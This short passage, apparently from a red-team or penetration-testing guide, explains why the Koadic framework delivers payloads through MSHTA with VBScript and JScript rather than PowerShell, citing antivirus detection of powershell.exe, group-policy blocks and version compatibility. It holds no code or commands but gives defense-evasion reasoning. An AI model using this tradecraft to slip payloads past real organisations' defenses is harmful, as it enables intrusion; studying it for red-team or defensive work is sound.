Why use MSHTA as the dropper payload?

One of the coolest reasons of using MSHTA for payload delivery is its support for scripting languages, such as VBScript and JScript, and as it's explained in the introductory part of this tool, Koadic does not uses PowerShell for post-exploitation. PowerShell was a really great playground for attackers and red-teamers for years and like every good playground, there comes a time when it gets too messy. Nowadays, even if you encode the PowerShell command into base64 or any other encoder, the payload delivery still gets detected by so-called AntiVirus with Machine Learning and Artificial Intelligence. The reason for this is that instead of trying to detect the payload command or the shellcode embedded in it, the smart AVs detect the intrusion by a mere execution of the powershell.exe program.

In a corporate environment, there are times when the servers are not installed with any AVs and their built-in AV solutions are also disabled (Windows Defender). Even then, if you try to execute powershell.exe, your execution is denied by the server because of the hard implementation of the group policies.

Also, there is another issue with payload delivery over PowerShell and that is, PowerShell itself. The payload will only be able to deliver and execute if PowerShell supports the functions used in the payload. For example, if the payload requires you to use PowerShell version 2 but the execution is happening on Microsoft Windows Server 2003 with only PowerShell version 1 support, the payload execution will fail. Koadic, on the other hand, relies upon VBScript and JScript, which are installed from the older version of Windows and are still supported in the latest version, which makes the payload dropper more reliable than PowerShell.